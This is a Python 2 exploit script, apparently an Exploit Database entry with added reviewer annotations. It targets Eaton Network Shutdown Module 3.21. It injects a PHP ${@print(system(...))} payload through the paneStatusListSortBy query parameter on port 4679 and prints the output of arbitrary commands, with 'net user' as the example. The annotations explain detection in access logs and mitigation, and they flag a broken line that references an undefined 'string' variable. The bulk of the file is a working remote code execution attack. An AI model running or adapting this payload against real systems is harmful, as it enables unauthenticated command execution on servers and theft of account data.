#!/usr/bin/env python
#
# Quick 'n' Dirty - Metasploit module didn't do it for me
# 2013 - Filip Waeytens - http://www.wsec.be
#
# Usage Example:
##~$ python eaton.py 192.168.1.9 "net user"
#
#User accounts for \\
#
#-------------------------------------------------------------------------------
#GuestLocalAdmin
#The command completed with one or more errors.
#
# Exploit Title: Eaton shutdown module php eval exploit
# Date: 5 dec2013
# Exploit Author: Filip Waeytens
# Vendor Homepage: powerquality.eaton.com
# Software Link: http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp
# Version: 3.21
# Tested on: WIN
#References:
###Exploit Database: 23006
###Secunia Advisory ID: 49103
###Bugtraq ID: 54161
###Related OSVDB ID: 83200 83201
###Packet Storm: http://packetstormsecurity.org/files/118420/Network-Shutdown-Module-3.21-Remote-PHP-Code-Injection.html
#
# Reviewer notes (what this script does, and what to look for on the defending side):
#  - Flat Python 2 script (httplib, print statement). It sends a single HTTP GET to
#    TCP port 4679 of the host given in argv[1] and prints text taken from the reply.
#  - The request goes to /view_list.php and carries the whole payload in the
#    paneStatusListSortBy query parameter. The value is a PHP "${...}" expression
#    wrapping system(), percent-encoded by urllib.quote_plus, so in access logs it
#    begins with %24%7B%40print%28system%28 (decoded: ${@print(system( ).
#    A sort-order parameter has no reason to contain either form; matching on it in
#    web/proxy logs or an IDS rule is the obvious detection point.
#  - The request as built here carries no credentials, cookies or extra headers,
#    which suggests the endpoint is reachable without authentication -- confirm
#    against the advisories listed under References.
#  - The header names version 3.21 as affected. Mitigation is a vendor-fixed release
#    (see the advisories above) and keeping port 4679 reachable only from the
#    management network.
#
import httplib
import urllib
import sys
import BeautifulSoup

#### First argument is the target IP - port defaults to 4679
# (the port is in fact fixed at 4679 below; there is no argument to override it)
targetip = sys.argv[1]
command = sys.argv[2]
targetport=4679

#### if a command has spaces: put between double quotes, the next lines strip the quotes
# NOTE(review): `string` is not imported or defined anywhere in this listing, so this
# test raises NameError whenever the first operand is true.
if command.startswith('"') and string.endswith('"'):
    command = command[1:-1]

#### build the urL to request
# The payload is the PHP expression below with the command text concatenated in
# unmodified, then percent-encoded as a query-string value.
baserequest = "/view_list.php?paneStatusListSortBy="
wrappedcommand="${@print(system(\""+command+"\"))}"
ue_command = urllib.quote_plus(wrappedcommand)

#### send request
# Plain HTTP (no TLS) and no timeout is set on the connection.
conn = httplib.HTTPConnection(targetip+":"+str(targetport))
conn.request("GET", baserequest+ue_command)
r1 = conn.getresponse()
#print "Getting answer: "
#print r1.status, r1.reason
#print "sent http://"+targetip+":"+str(targetport)+baserequest+ue_command
data1 = r1.read()

#### extract answer
# The reply body is parsed as HTML; for every <p> element the text before the first
# "Warning" is kept and the first occurrence of the page's banner sentence is removed.
# The HTTP status is never checked, so an error page is processed the same way.
soup = BeautifulSoup.BeautifulSoup(data1)
for p in soup.findAll("p"):
    #print dir(p)
    #strip first line
    result = p.getText().split("Warning")[0]
    print result.replace("Multi-source information on the power devices suppying the protected server","",1)